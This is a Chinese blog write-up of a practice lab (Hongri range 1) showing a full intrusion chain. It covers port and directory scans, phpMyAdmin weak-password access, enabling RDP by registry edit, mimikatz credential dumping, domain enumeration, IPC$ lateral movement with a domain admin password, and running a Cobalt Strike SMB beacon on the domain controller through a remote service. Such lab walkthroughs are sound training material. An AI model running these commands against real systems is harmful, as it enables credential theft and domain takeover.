红日靶场1复盘

环境说明:

机器 网卡1 网卡2
web服务器 192.168.111.128 192.168.111.128
域控主机 192.168.52.138
域内主机 192.168.52.141

环境配好了,注意web主机需要在c盘中开启apache服务

一. 信息收集

1.1 端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root?kali)-[~]
└─# nmap 192.168.111.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-28 01:19 EDT
Nmap scan report for 192.168.111.128
Host is up (0.0017s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
3306/tcp open mysql
3389/tcp open ms-wbt-server

1.2 目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~]
└─# dirb http://192.168.111.128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jun 27 00:36:04 2025
URL_BASE: http://192.168.111.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.111.128/ ----
+ http://192.168.111.128/aux (CODE:403|SIZE:212)
+ http://192.168.111.128/com1 (CODE:403|SIZE:213)
+ http://192.168.111.128/com2 (CODE:403|SIZE:213)
+ http://192.168.111.128/com3 (CODE:403|SIZE:213)
+ http://192.168.111.128/con (CODE:403|SIZE:212)
+ http://192.168.111.128/lpt1 (CODE:403|SIZE:213)
+ http://192.168.111.128/lpt2 (CODE:403|SIZE:213) + http://192.168.111.128/nul (CODE:403|SIZE:212) + http://192.168.111.128/phpinfo.php (CODE:200|SIZE:71459) ==> DIRECTORY: http://192.168.111.128/phpmyadmin/ ==> DIRECTORY: http://192.168.111.128/phpMyAdmin/ + http://192.168.111.128/prn (CODE:403|SIZE:212)

二. 漏洞探测

发现了phpMyAdmin ,弱口令登录成功,通过日志的方式写入shell

集体步骤:https://blog.csdn.net/m0_73062138/article/details/147000277?spm=1001.2014.3001.5501

三. 漏洞利用

获取杀软名,发现该机器没有杀软

1
2
C:\phpStudy\WWW> WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
No Instance(s) Available

查看RDP的端口(注意:使用16进制转10进制):

1
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

根据刚查看的端口,查找服务是否开启:

1
netstat -ano | findstr "3389"

没有开放3389端口,手动开启RDP服务:

1
reg add "HKLM\SYSTEM\CurrentControlSet\control\Terminal Server" /v fDenyTSConnections /d 0 /t REG_DWORD /f

使用mimikatz 进行抓取密码:

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

连接RDP:

四. 内网信息收集

4.1 收集当前的登录账号:

1
whoami    hostname:(机器名)

该账户是域账号

4.2 查询域的名字

1
systeminfo

4.3 域中有几个用户

1
net user /domain

域中有5个用户名

4.4 域中有几个电脑

1
net group "domain computers" /domain 

有三台电脑。

4.5 获取主机的IP地址和域控的位置

1
nslookup -type=SRV _ldap._tcp

域控的IP地址是: 192.168.52.138

域控的全名是:owa.god.org (注意:owa是域控的机器名)

4.6 查询IP地址信息

1
ipconfig

发现是一个双网卡的机器

IP地址为:192.168.111.128 和 192.168.52.143

4.7 查看内网网段机器存活情况

1
arp -a

得到了两个IP:

192.168.52.138 — 域控的IP地址(nslookup -type=SRV _ldap._tcp)

192.168.52.141 — ROOT-TVI862UBEH.god.org (域内的主机)

192.168.52.143 — STU1.god.org(已经控制的机器Web)

确认主机对应的IP:

五. 内网渗透

5.1 使用CS上线主机(注意靶机不能出网,需要使用111网段的木马程序)

六. 横向移动

APT(高级持续性威胁)是横向移动带来的最常见的网络攻击类型

6.1 IPC$横向移动

IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算 机的共享资源时使用,可以传文件,但是不能进行流量的代理

前提:必须要知道域控的账号密码

1
2
shell  net use \\192.168.52.138\ipc$ "hongrisec@2020" /user:god\administrator
shell net use //检查IPC$是否建立成功

七. 隧道代理

7.1 创建一个SMB隧道

SMB Beacon:

SMB Beacon 使用命名管道通过父级Beacon进行通信,当两个Beacon连接后,子Beacon从父Beacon获取任务并发送。

7.2 上传smb.exe 到服务器上

7.3 从web机器上复制到域控上(IPC远程复制文件)

1
2
shell copy 文件 \\IP地址\C$
shell copy smb.exe \\192.168.52.138\C$

7.4 使用服务运行smb木马程序

1
shell sc \\owa.god.org create test binpath= "cmd.exe /c c:\smb.exe"            //test服务

7.5 开启服务

1
shell sc \\owa.god.org start test

7.6 连接目标服务器

1
link owa.god.org

成功获取域控:


红日靶场1复盘
http://example.com/2025/06/27/红日靶场1复盘/
作者
XCDH
发布于
2025年6月27日
许可协议